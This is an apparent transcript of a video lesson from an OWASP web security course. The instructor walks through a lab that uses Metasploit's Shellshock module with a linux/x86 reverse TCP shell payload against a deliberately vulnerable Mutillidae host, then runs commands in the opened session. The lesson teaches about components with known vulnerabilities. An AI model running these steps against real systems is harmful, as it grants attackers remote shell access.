OWASP

Course
Time: 12 hours 9 minutes
Difficulty: Beginner
CEU/CPE: 12

Video Transcription

00:01
Hi, everyone. Welcome back to the course. So in the last video, we went ahead and started configuring our Metasploit Framework console, so that way we can start running our Shellshock attack. Now, in this video, I've already, actually, in the background there, you'll see I've already typed in the use exploit, etcetera, from step 20. But we'll go ahead and we'll start that together as well, and then we'll move forward with the rest of our lab.
00:22
So we're gonna type in use and then exploit
00:27
and we'll go back to the lab document here so you can see. So use exploit, then we'll type in forward slash multi, forward slash http, forward slash apache, underscore mod, underscore cgi, underscore bash,
00:41
underscore env,
00:43
and then finally underscore exec.
00:46
So, as I mentioned, I've already run the command, but it will not hurt us to run it again. So you want to do use, space, exploit, forward slash multi,
00:56
forward slash http,
00:58
forward slash apache,
01:00
underscore mod,
01:03
100! You put a lot of these there. Let's go back. There we go. Underscore cgi,
01:08
underscore bash,
01:11
underscore env, and then finally underscore exec. And then just press Enter on your keyboard. Now, as I mentioned, I've already run it, so that's why I'm already in that particular module.
01:21
All right, so let's go back to our lab document here.
01:23
So the next thing we're gonna do is just type in show options so we can see what kind of options we have for our particular attack.
01:30
So let's do show options here.
01:33
And then it'll list out all the options available to us.
01:37
So if you scroll up, you can take a look and see.
01:42
All right, so let's go back to our lab document now.
01:46
So we're gonna type in first, we're gonna do set RHOST, set RHOST mutillidae. So again, we're not doing the S there; it's not RHOSTS like we've done before. We're gonna do set RHOST mutillidae.
01:57
So set RHOST and then mutillidae.
02:01
All right, and then just press Enter on your keyboard,
02:05
and then we're gonna go ahead and do the second command here, the set TARGETURI forward slash cgi dash bin forward slash status dot cgi. So let's go ahead and type that now. So set,
02:17
and then we're gonna type in TARGETURI
02:21
and what type of correctly there.
02:24
All right. And next we're gonna put a space, and then we'll type the rest of our command here. So the forward slash cgi dash bin forward slash status dot cgi. So we'll start off by just typing in forward slash cgi-bin, so that way we can slow down a little bit for this lab.
02:39
So we'll do forward slash cgi dash bin,
02:43
we'll do a forward slash,
02:45
and now we're gonna type in status dot cgi.
02:49
Okay, so we'll type in status
02:51
dot cgi. We'll just go ahead and hit Enter on our keyboard to run that.
02:54
It might take a moment or so, you'll see, to run that command for us.
02:59
So let's move on to the next part of our lab.
03:00
So now we're going to specify the reverse shell that we want to use for a payload in this attack. And now we're just gonna basically set our payload with this particular reverse shell, we'll show options, and then we'll go through and actually run this payload a little later on in this lab. So we're gonna type this command here, so we'll type in set and then payload. We'll start off with that. So type set,
03:21
then payload,
03:23
we'll put a space.
03:24
Next, we're gonna type linux forward slash x86.
03:30
So we'll type linux, all lower case, forward slash x86,
03:35
and then we're gonna type in forward slash shell underscore reverse underscore tcp. So shell reverse TCP,
03:43
so forward slash shell underscore reverse
03:46
underscore tcp,
03:49
and I'll just press Enter on the keyboard to run that command.
03:53
All right, so next up, we're gonna type in this show options command. So here in step 26 we're just gonna type in show options
04:00
to see what kind of options we have.
04:01
Again, we could scroll up and take a look at the different options available to us for this particular payload,
04:08
but for us, we're just gonna type in, we're gonna set the LHOST to this IP address right here. So set LHOST
04:15
to this IP address here, this 192.168.1.50.
04:20
So 192.168.1.50, and then just press Enter on the keyboard to run the command.
04:28
All right, so now we're gonna finally run the exploit. So we've set everything up, we've configured everything, we've got everything good to go. Now we're just gonna type the word run in our command prompt, and we're gonna see if we're successful in opening our command shell. So just run and then press Enter on the keyboard.
04:43
All right, so you'll see here that we see started reverse TCP handler and command shell is open. So at least on my end, I was successful in opening a command shell.
04:53
Now, if you were not successful, if you got some kind of error message, go back through everything you've typed, make sure that your syntax was correct and you've typed everything correctly, and then try to run it again.
05:02
All right, so
05:04
the next thing we're gonna do is actually connect to our session here. So we want to go ahead and take control of it where we can type different commands. So we want to be able to interact with it. So all we're gonna do is type sessions, dash lowercase i, dash the number one.
05:16
So sessions,
05:18
dash lowercase i, dash the number one, and just press Enter on the keyboard. Now that's going to start the interaction with that session.
05:27
All right, so a few things you can try and see what kind of output you get. You can type ifconfig and press Enter, and then also try typing id and various commands and see what kind of information you get back.
05:40
So we'll type ifconfig.
05:43
Just press Enter and see what kind of information. You'll see we get some IP address information about the local machine there.
05:48
Also, if we type in id,
05:51
it'll get us back information about the user ID. So again we see that www-data. So we know that we can potentially run different commands on the machine.
06:00
All right, so we do see some output back. Again, just play around, run different commands there. In this video, we just wrapped up our discussion, or our lab, on using components with known vulnerabilities. And in the next module, we're gonna talk about, a lot of places, a lot of places will log stuff, but they won't actually monitor it, so there's action taken on it.

OWASP

Established in 2001, the Open Web Application Security Project (OWASP) offers free security tools and resources to help organizations protect critical apps. Cybrary’s OWASP certification training course covers the organization’s popular “Top 10” risk assessment.

Instructed By

Ken Underhill
Master Instructor at Cybrary